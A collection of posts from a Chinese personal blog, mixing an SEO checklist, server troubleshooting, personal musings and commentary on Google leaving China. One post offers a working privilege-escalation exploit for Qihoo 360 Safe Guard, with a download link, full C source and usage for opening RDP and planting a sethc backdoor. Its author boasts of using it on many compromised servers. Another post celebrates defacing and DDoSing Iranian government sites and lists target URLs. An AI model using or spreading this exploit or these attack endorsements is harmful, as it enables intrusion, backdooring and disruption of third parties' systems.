标准seo分析,seo中应该注意什么

本文来自英文网站seo与英文网站研究,非原创 呵呵

其实不大喜欢这个啦 seo本来就很简单,相对于我们要研究的来所

不过看到一兄弟那么想学习这个就转载来了!

要检查的内容

A:首页

B:网站

C:站外

SEO检查列表

A1:首页-www.domain.com

检查是否跳转(redirects)及其他(canonicalization issues)
选择 http://domain.comhttp://www.domain.com
将domain.com/(index|main).(html|htm|php|cfm|asp)跳转到domain.com
A2:首页-导航

检查导航是否为图片、下拉菜单、Javascript代码、图片热点链接,用文字做导航是最佳选择

A3:首页-内容

页面上有多少文本内容?越多越好
检查首页关键词密度 http://www.ranks.nl/tools/spider.html
检查是否使用H2标签(H2 tags)和加粗字体(blod fonts)(适当的使用)
必须有一个网站地图(sitemap)
选择全部(ctrl + A)看看是否有隐藏文字
检查搜索引擎看到你的网站是什么样子,使用SEO浏览器,确保网站可索引
B1:网站-meta标签

检查标题标签(title)。是否包含关键词,是否格式正确
如果主要推广品牌,标题格式: 品牌名|关键词,关键词
如果不是做品牌,标题格式: 关键词,关键词,关键词|品牌
检查描述标签(description)。是否包含关键词,是否通顺。确保描述在前几句准确的描述整个网页内容。
确保关键词标签(keywords)包含5~10个关键词,不要太多也不要太少
确保整站没有重复的meta标签
B2:网站-URL规范

检查URL格式。动态的URL不太好,太长的URL在Google的SERPS里面会被切断。
URL尽量包含关键词,用短横线(-)把它们分隔开
短横线(-)比下划线(_)好
URL包含的关键词要和对应网页内容一致
B3:网站-统计(analytics)

确保安装了统计工具,不一定要使用Google分析,但每个页面都要能被统计到。

B4:网站-链接

链接锚文字要包含关键词
链接的title标签要和关键词相关
锚文字、链接关键词、链接title、链接到的网页要相互相关
网站链接结构必须要循环(Site linking structure should be cyclical. There should be no dangling pages.)
使用Xmenu检查网站是否有死链接
B5:网站-nofollow(高级)

nofollow隐私策略、联系我们等对网站排名无用的网页
如果你想了解更高级的链接结构优化技巧,可以参考slightly shady seo 或 Andy Beard
B6:网站-robots.txt

检查是否有robots.txt文件
robots.txt屏蔽了哪些内容
确保robots.txt格式正确,参考Sebastian’s Pamphlets
B7:网站-重复内容

确保站内没有重复内容
确保你网站的内容没有被别人复制,使用CopyScape来检查
B8:网站-pdf文件

网站有pdf文件吗?如果有的话,可以用新的标题、关键词、评论来优化文件。使用Adobe Acrobat Professional来编辑pdf文件

B9:网站-图片

图片要有alt属性,让alt包含一些关键词。Google图片搜索也许可以找到这些图片并带来流量。

C1:外部-收录

在Google、Yahoo、MSN检查网站的收录情况

C2:外部-外链

两个Firefox插件Search Status 和backlink checker 可以帮助你分析外链

做无盘,碰到的问题

        本来做个锐起的无盘网络很简单的,网上操作流程都是有的,但是从购置硬件到组建网络,再到硬件故障,有时候真的很让人无语。

        网上流传的绿茶Win2003服务器版不能做无盘,我下载了一个绿茶的高级服务器版做无盘,下面的客户机识别到硬盘之后就不能格式化,我觉得应该是权限的问题,不过不想修改了。直接安装了原版windows2003

        后面是阵列卡出问题,右下角不停提示windows延缓写入失败,事件查看器里提示设备 \Device\Harddisk1 的访问功能尚未就绪。 其实就是第二块硬盘掉了。我的服务器装了三块硬盘,一个80G做系统,两个500G,一个用,一个备份。 说第二块硬盘未就绪,有可能是数据线问题,然后是阵列卡和硬盘的问题,我换了数据线,然后扫描硬盘坏道(新买的希捷硬盘,无坏道),问题依旧,我找配电脑给我的商家换了一块阵列卡,然后就OK了!~

但是这几天因为我的服务器原因给同事们带来的不满着实让我冷汗啊!以后得夹着小尾巴呀,。

小心被
 oooO ↘┏━┓ ↙ Oooo
 ( 踩)→┃你┃ ←(死 )
  \ ( →┃√┃ ← ) /
  \_)↗┗━┛ ↖(_/

做无盘,碰到的问题 - dark clout - 小男生-博客做无盘,碰到的问题 - dark clout - 小男生-博客

父母馈赠与个人得失

        今天接到老妈的电话,不住的说哪一套房子给我,我不在家里住也要把房子卖了给我钱。从来没想过会有这样的事情,稀里糊涂的,还记得家里那套房子,很大,很漂亮,也很喜欢,只是处在闹市区,喧哗的有点让人睡不好觉。

        父母给什么,是他们的心意,当我已经长到23岁的时候,我期望能够凭着自己的努力得到点什么。而不是总把他们作为骄傲,我希望有一天他们能把我作为他们的骄傲。

        最后,现在的经济都是钢筋水泥在撑着。房价也弄的暴高!如果真的存在爆破那一天,房价又会是怎样? 我是不是应该趁下一个通货膨胀的预期把房子卖掉?对统计局发布的经济数据感觉好失望!

奇虎360安全卫士服务器提权

不知道该说什么好了,以前拿了很多shell,一直懒得提权,一是没那个必要,二是提权太累了,三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权,何乐而不为呢?

于是360本地提权来了,最近已经沸沸扬扬的了,不多发表过多评论,只是觉得做公司更要厚道;本人菜另外还有很多兄弟在360,不说什么了,发了本地提权的利用程序吧。friddy那里已经有一份了,是用来替换5下shift为cmd.exe的:360本地提权webshell下测试程序

瑞星说是“bregdrv.sys和bregdll.dll”出的问题,然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的,于是这个利用程序也是基于这个的。webshell下使用,guest权限即可,需要Wscript.shell支持,功能主要是:

1.开启终端服务,端口为3389;用法:360.exe port

2.替换5下shift为cmd;用法:360.exe sethc

另外大家可以参考下包子的文章:360 0day漏洞及相关内幕,360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了,具体是真是假,大家自己试试这个工具还能不能用吧。

这个工具不针对任何公司和个人,仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上,我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权,发现360在服务器的普及率也高的惊人,至少有80%,怪不得大家都提权提的爽死了,于是乎,很多肉鸡终于找到家了。

现在终于知道服务器类型的肉鸡的好处了,一是用来上线;二是用来摆放垃圾未备案域名;三是用来跑密码…看来之前轻视了。

演示:

奇虎360安全卫士服务器提权 - dark clout - 小男生_博客

(注:本图片只限学习,拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)

下载:http://www.oldjun.com/download/360.exe

奇虎360安全卫士本地提权漏洞后门利用程序

#include <windows.h>

typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_DELETE_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"

#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"

BOOL InitBRegDll()
{
         LONG lResult;
         HKEY hKey;

         CHAR cPath[MAX_PATH + 32] = { 0 };
         DWORD dwPathLen = MAX_PATH;

         lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
         if (FAILED(lResult))
                  return FALSE;

         DWORD dwType = REG_SZ;
         lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
         RegCloseKey(hKey);
         if (FAILED(lResult))
                  return FALSE;

         strcat(cPath, "\\deepscan\\BREGDLL.dll");

         HMODULE modBReg = LoadLibraryA(cPath);
         if (!modBReg)
                  return FALSE;

         INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
         BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
         BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
         BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
         BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

         if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         if (!InitRegEngine()) {
                  FreeLibrary(modBReg);
                  return FALSE;
         }

         return TRUE;
}

LONG TestSetRegKey()
{
         HKEY hKey;
         LONG lResult;

         lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
         if (FAILED(lResult))
                  return lResult;

         DWORD dwType = REG_SZ;
         static char szData[] = "TEST VALUE";
         lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
         BRegCloseKey(hKey);

         return lResult;
}

int main(int argc, char *argv[])
{
         if (!InitBRegDll()) {
                  MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
                  return 1;

         }
         if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
                  MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
                  return 2;

         }

         if (FAILED(TestSetRegKey())) {
                  MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
                  return 3;
         }

         MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);
         return 0;
}

2010.02.05

程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

那一天

         无论我怎么气愤的想要离开,我的身体碰到她的时候却还是会兴奋,那加速的血液总是让我丧失理智。

         她急速的转身,移动身体,我看不清两腿的交替,只有屁股的扭动,然后消失在人群中。我无奈的转身,看着远处的车辆,继续往家走……

留下吧!Google

         消息传来,谷歌总部正在评估自己在中国商业运营的可行性,并可能完全退出中国市场。谷歌在中国的搜索引擎市场占有26%的市场份额。

         多年以来,谷歌公司以其创新精神和“不作恶”的商业伦理,在世界范围内获得了广泛赞誉。虽然业绩不如百度,但各界公认的是,谷歌中国是比百度更有原则、更负责任的公司。这也是为什么这一年来发生了谷歌色情门以及谷歌图书馆侵权事件,业界及中国网民却仍对谷歌不失敬意的原因。

         然而,谷歌公司所信奉的商业伦理必然会与中国目前的商业环境发生冲突。因此,选择退出还是留下,恐怕不仅仅是一个商业问题,而是其面临的道德困境。这个道德困境其实同样困扰着很多跨国公司。退出固然能够使谷歌保持道德上的某些原则,但无疑也会伤害无数中国用户的感情。而如果留下,或许只有两种选择:一是如很多跨国公司一样进行公司伦理的本土化,与现实的商业环境“同流合污”;二是被动地合作,为坚持原则而比竞争对手付出更多的代价。这其实需要一种自我牺牲的精神。应该说,无论做出怎样的选择,对谷歌公司来说都是痛苦的。

        谷歌公司怀有整合全人类信息的宏大梦想,要实现这个梦想,是不可能离开中国的。即便现在退出了中国,早晚也会在条件改善之后再回来。事实上,一个更良好的商业环境不会因为一个公司的退出而到来,更不会凭空从天上掉下来,其需要的正是在秉持“不抛弃、不放弃”的原则下日积月累的种种工作。如果真的把自己视为一个负责任的公司,谷歌为什么不选择和它的中国用户一起坚守下来呢?在一个劣币驱逐良币的市场环境中,良币其实不应首先自我放弃。

     

美国当地时间1月12日15时,谷歌高级副总裁和首席法律顾问大卫·多姆德(David Drummond)在谷歌官方博客上发文表示,谷歌集团考虑关闭“谷歌中国”网站以及中国办事处。

该博客宣称,我们已经决定,不愿意继续审查“谷歌中国”搜索到的结果。如果有可能的话,接下来的几周里,我们将和中国政府商议,在法律允许范围内运行一个不必经过过滤的搜索引擎。如果不能达成协议,可能意味着我们将不得不关闭“谷歌中国”,甚至是谷歌中国办事处。

———从Google的股价有多高就知道市场认为这公司有多重要,它确实代表了未来的方向。而且鉴于它和各行业切不断的联系,它一旦完全退出中国,可能引起连锁反应,尤其是互联网产业,这对任何人都没有好处,所以此时我只能希望这盘棋对局的多方不要把棋下死了。

———为什么在世界任何角落都钱途光明、简直就是互联网代名词的Google居然会觉得无利可图?背靠数亿使用中文的网民,现在赚不了大钱没关系,但对未来赚钱的前景如此悲观,实在是耐人寻味。

———我的Gmail邮箱怎么办?我跟Google的一切都应该怎么办?没有了Google,互联网跟局域网越来越像了。

———如果没有Google,我很好奇国内搞科研的人怎么搜索研究文献?

           虽然我知道中国不会存在不必经过过滤的搜索引擎,但是我还是幼稚的希望这一切会只是一个谎言。就像小时候想骗父母的一块钱为自己买个棒棒糖。

                                                           留下吧!Google - dark clout - 小男生_博客

           Google,我是如此爱你,却只能沉默站在原地,像一个迷失孩子般,遗落在人群……留下吧。

 

百度被黑_黑客网战

1月12日早上,所谓的伊朗网军黑掉了中国著名商业网站 百度 www.baidu.com

一个小时候中国红客联盟,暗组技术论坛等很多知名黑客组织迅速组织力量奋起反击。ir 结尾的域名是伊朗国家域名,类似我们的 cn  就是中国的意思。

    http://room98.ir/

http://ksh-behzisty.gov.ir/

http://www.irun.ir/

http://www.irib.ac.ir/

http://pankration.gov.ir/

http://www.iribu.ir/

http://www.diabetes.ir/home/#top  最可怜的是这个糖尿病网站,被N多人改来改去。

外交部    www.mfa.gov.ir

司法部    www.judiciary.ir

科技研究部    www.msrt.gov.ir

国防部    www.mod.gov.ir

内务部    www.moir.gov.ir

卫生与医药部    www.mohme.gov.ir

教育部    www.medu.gov.ir

文化与伊斯兰指导部    www.ershad.gov.ir

商业部   www.moc.gov.ir

农业圣战部   www.maj.gov.ir

福利与社会安全部    www.refah.gov.ir

这个时间段,伊朗的政府网站基本都瘫痪了,QQ群里的人都在用DDOS攻击没有漏洞的网站。我建议拿下伊朗领袖的站,不过,似乎没人愿意去做!今天是最有意思的一天

百度被黑-中伊黑客网战 - dark clout - 小男生的博客

 百度被黑_黑客网战 - dark clout - 小男生_博客

百度被黑_黑客网战 - dark clout - 小男生_博客

对于事件发生之后,大众往往把更多的注意力聚集在原因上,却忽略了对其利益链条上环环相扣的诸多环节的影响。更何况百度拥有庞大的利益集团,其日均 IP 访问量约为18,240,000,日均 PV 浏览量大约145,920,000,这对于一般网站是个望尘莫及的数字。正所谓“牵一发动全身”,可想而知,其影响程度更是难以比拟的。

 

虽然百度的利益链条不容小觑,但正反始终是相融于一体的,有消息传出,这次百度被黑导致百度亏损远超过700万,百度股价受断网影响下挫3.51% ,为1个月最低点。一家欢喜一家愁,百度此次事件引申的经济学远不止这些。

 

其一,由于百度断网11个小时,与之竞争的谷歌、搜搜、搜狗、中国雅虎等其他搜索引擎访问量明显攀升,尤其给谷歌这个百度冤家带来的机会不小,“百度”一词成为12日谷歌上升最快的关键词。只不过,1月13日,又有消息称,谷歌在其官方博客上表示,考虑关闭中国运营及Google.cn网站,致使在当天谷歌的盘后交易中股价挫跌1.3%,可见,谷歌的实际经济利益增长也不显著。

 

其二,之前有媒体曝光黑客灰色利益链出炉,且年收入可破百亿。显然,黑客群体的增长速度是难以预测的,加上曾有专家推测2010年黑客的数量又将有新的发展。在这次的百度事件中,黑客当然是最醒目的名词,由于中国黑客攻击行为并没有受到舆论的谴责,而是欢呼雀跃,原因在于其发扬了爱国主义,为中国争回了颜面,着实又让黑客火了一回。

 

其三,“百度被黑”了,“伊朗网军”出名了,米农们瞄准时机,开始抢注域名了:百度被黑(baidubeihei.com)、伊朗网军(yilangwangjun.com)等等相关域名迅速被注册。不过,国内刚刚对CN域名注册做了限制,预计与之相关的.CN域名无人注册。

 

其四,这次复仇行动远不止中国黑客,其中包括一个较疯狂的行为,一些中国网友组团给iranian.cyber.army@gmail.com(伊朗网军邮箱)发信:“A big FUCK YOU from China.”,为此以解心头之恨。但是这也需要考虑到对方的黑客身份,发信邮箱极有可能被黑,必然会注册马甲邮箱,故此邮箱注册增长并无可能。

谷歌DNS上网加速

         出租房这里上网速度实在是个慢,半夜两点房东都还跟我抢带宽。卡的受不了,猛然想起谷歌推出免费DNS服务了,轻轻一试,差点没吓死。速度快的惊人!!!!!!!

使用方法:如图所示,只需要把DNS服务器改为::“8.8.8.8”和“8.8.4.4”即可

谷歌DNS上网加速 - dark clout - 小男生的博客

Google提供的公共DNS服务与电信或联通的不同,当用户输入一个错误的或者不存在的网址的时候,不会像中国电信一般直接弹出一个满屏都是广告的114页面,Google公司承诺绝不会重定或者过滤用户所访问的地址,而且绝无广告。这样也能很好的预防dns劫持/攻击了,速度又那么快,何乐而不为呢!哈哈

谷歌DNS上网加速 - dark clout - 小男生的博客电信,铁通,联通/网通等dns服务器都不同,电信的114,联通/网通的域名纠错系统都是满屏的广告。DNS服务器维护还很不到位,不用它们了!!